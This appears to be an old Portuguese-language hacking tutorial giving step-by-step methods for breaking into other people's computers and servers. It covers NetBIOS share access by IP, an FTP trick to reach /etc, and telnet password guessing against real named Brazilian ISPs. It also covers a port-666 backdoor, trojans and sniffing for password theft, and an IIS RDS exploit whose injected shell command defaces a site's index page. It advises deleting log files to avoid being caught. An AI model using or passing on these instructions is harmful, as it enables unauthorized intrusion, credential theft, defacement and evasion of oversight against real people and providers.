Tipos de Invasão!

Invasao via Ip

1º PASSO - Veja se você possui o programa NBTSTAT;
2º PASSO - Vá ao PROMPT do DOS;
3º PASSO - Digite: NBTSTAT -a (IP DO CARA);
4º PASSO - Irá aparecer se o computador da pessoa tem compartilhamento dearquivos ou não. Se não tiver aparecerá HOST NOT FOUND.
5º PASSO - Se aparecer mensagens entre esta marca <03>, você deverá pegaraquele arquivo.
6º PASSO - Mapeie a sua unidade de disco para tornar as duas máquinas em umasó.
7º PASSO - No Windows vá em INICIAR, EXECUTAR e digite "//IPdocara e dêOK.
8º PASSO - Você invadiu por IP!!!!
Mas, não se esqueça NUNCA apague nem modifique nada,
apenas fusse e veja se encontra algo que lhe interessa e depois copie... OBs.:Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para nãoconseguirem te nukar ou te invadir...
Conselho, renomeie-o também.






Invasao via FTP

Primeira coisa que deve saber...
Não fique, em hipótese alguma mais de 5 mim,
senão é cadeia na certa, á não ser que a conta seja RACKEADA.
Siga os passos:
1º PASSO - No DOS digite FTP;
2º PASSO - Eu aconselho a digitar "?" para ver so comandos do FTP;
3º PASSO - Digite "open". Irá aparecer a mensagem "TO';
4º PASSO - Escolha um servidor de FTP (ftp.mandic.com.br, ftp.sol.com.br,ftp.plugnet.com.br, etc.);
5º PASSO - Espere conectar e digite "quote cwd~root" ou "quotecwd~sys';
6º PASSO - No PASSWORD coloque "quote pass ftp';
7º PASSO - Você vai entrar no diretório home/root, dê um "cd/etc';
8º PASSO - Pronto, você está no lugar certo, mas não se esqueça, as senhas sãocriptografadas, não adianta copiá-las, a não ser que tenha um programa paradescriptografá-las.
OBs.: Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para nãoconseguirem te nukar ou te invadir... Conselho, renomeie-o também.







INVASAO VIA TELNET...

Ataque via Telnet é um dos poderosos, devido os comandos que a mesma aceita etambém suas tentativas de entrada não são registradas e você pode tentar quantotempo quiser (mas nunca exagere), mas também tem sua "parte mal",você geralmente "cai" dos servidores "lentos" e tambémdemora para enviar e receber os dígitos, por enquanto você digita ele demora umtempo para aparecer o que você digitou, ele não envia palavra por palavra, massim caracter por caracter, por isso a demora, mas mesmo assim, ele éfundamental para quem tá querendo alguma coisa boa...
Vamos ao ataque:

Entre na Home Page de algum servidor através de seu browser, e procure pelalista de home pages pessoais. Passando o mouse sobre os links que levam àpágina de cada usuário você pode perceber um padrão do tipo:
http://www.servidor.com.br/~usuário
Onde "usuário" é o login do dono da página. Se você usa o Windows 95vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95com o programa Telnet. Se você usa outro sistema operacional, inicie seuprograma de telnet. Conecte-se ao host do servidor (Ex:www.plisnet.com.br).Então entre com o Login de um dos usuários (olhando na lista de home pages) euse como senha esse mesmo login. Tente com todos os usuários. No final vocêdeverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize alógica, relacionando a senha com o login (ex.: login: kurt senha: cobain).








Invasao Via Porta 666

Para invadir é fácil
vc deve ter um programa de conexão via telenet (telnet que já vem com o WIN95ou similar)
e também um programa chamado aabout.
O q deve ser feito, este programa aabout deve ser acionado por ambas as partes(invasor e invadido)
e o q ele faz??
Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666.
Vc deve ligar o telenet colocar no rost o numero do IP da pessoa
e em port deve-se colocar 666. Bem vc já está conectado,
dai no login vc deve digita cg! (com o "!")
e dar um dir vendo tudo o q tem no CPU da outra pessoa








Roubando senhas

Cavalo de Tróia
O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugarde destruir programas e arquivos, ele tem a função de descobrir senhas. Ocavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou numdisquete que o hacker passa, com jogos ou outros programs, para usuários docomputador que quer invadir. Cada vez que o usuário escreve nome e senha, ocavalo de Tróia grava os dados. Como é programado para se conectar com seucriador, por meio do modem, em dia e hora marcados, ele transmite os dados quecopiou. Elementar, para quem conhece muito bem as linguagens do computador.
Farejamento de redes

Para acelerar a sua transmissão, os dados que entram nas redes, provenientes devários computadores, são agrupados em pacotes. O hacker cria programas farejadores quemonitoram a circulação desses pacotes nas redes e procuram neles palavras comopassword e senha. Quando encontra, o programa copia o pacote e o envia para ocomputador do hacker. Os dados chegam dificados, mas isso não é problema paraele, que, em geral conhece bem criptografia, o conjunto de técnicas que permitecodificar dados.

Engenharia social

É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nomedos filhos são muito comuns. Se o hacker tiver acesso a essas informações dousuário, vai tentá-las, como primeira opção, para descobrir sua senha. Algunschegam a arrumar emprego temporário na empresa que pretendem invadir. Ládentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora dedigitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser umhacker.

Quebra-cabeça

Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, ohacker cria programas capazes de montar todo tipo de combinação de letras enúmeros. O sistema funciona bem para senhas de até seis caracteres. O processodeve levar muito tempo, porque as tentativas precisam ser feitas em períodoscurtos, com grandes intervalos (dias, se for possível) entre um e outro, paranão despertar suspeitas. No Brasil é um método muito difundido, pois as senhasem geral são simples e dificilmente os computadores possuem sistema deproteção.

Invasão do servidor

O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo quecontém as passwords (ex. passwd). Com esse arquivo em mãos o hacker podedescriptografá-lo usando programas específicos. Dessa forma ele obtémpraticamente (a descriptografação não é 100% eficiente) todas as passwordsdesse provedor.

Dedução

Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usaro quebra-cabeça que precisa testar milhares de combinações, o hacker faz atentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõede três dados fundamentais:

1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login.
Ex: login:kurt senha:cobain

Mãos à obra!

Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método porser ele o mais simples. O penúltimo método também é descrito detalhadamente noFAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil)e procure pela lista de homepages pessoais. Passando o mouse sobre os links quelevam à página de cada usuário você pode perceber um padrão do tipohttp://www.servidor.com.br/~usuário, onde usuário é o login do dono da página.Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecleENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outrosistema operacional, inicie seu programa de telnet. A vantagem da conexão viatelnet é que suas tentativas de entrada não são registradas e você pode tentarquanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor(www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários(olhando na lista de homepages) e use como senha esse mesmo login. Tente comtodos os usuários. No final você deverá ter algumas senhas. Se você quiser maissenhas de usuários, utilize a lógica, relacionando a senha com o login (ex:login:kurt senha:cobain). Agora vem o próximo e mais valioso passo. Tentarpegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubraquais são as senhas padrões para o administrador em cada sistema. Novamenteusando telnet tente até achar ou desistir. Se você conseguir, vai ter acessototal ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha...você pode ser pego. Quando usar a senha do administrador, não esqueça de apagaros arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log,caso você não saiba.








Invasao por RDS

Obs.: Só funciona se o provedor usar Windows NT.
Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta quese encontra o index ou default, bom na maioria dos casos é só digitarwwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente éc:InetPubwwwroot , bom ai tem que descobrir se o servidor usaindex.asp,index.html,index.htm e mesma coisa com default.

Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc,bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index oudefault e qual a extensão, bom só testando.. www.servidor.com/index.extençõespossiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entraré o certo ai é só anotar, vamos supor que o diretorio é :c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS,ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela doRDS, agora apague tudo que tiver escrito no query e digite: Select * fromProducts where ProductType="|shell("cmd /c echo (O QUE QUER QUE APAREÇANO SEU HACKED) > c:InetPubwwwrootindex.htm")|" Depois é sóapertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é sopegar um exploit chamado msadc.pl e pronto.. vc usa assim: perl msadc.pl -hwww.servidor.com , se aparecer cmd , vc digita : (O que quer escrever) <C:InetPubwwwrootindex.htm (enter) só isso.

para ver se o servidor tem o bug do RDS é testando com omsadc/samples/adctest.asp ou passando um scaneador de vulneralidades!

(gosto do nessus pra linux),pega ele em www.nessus.org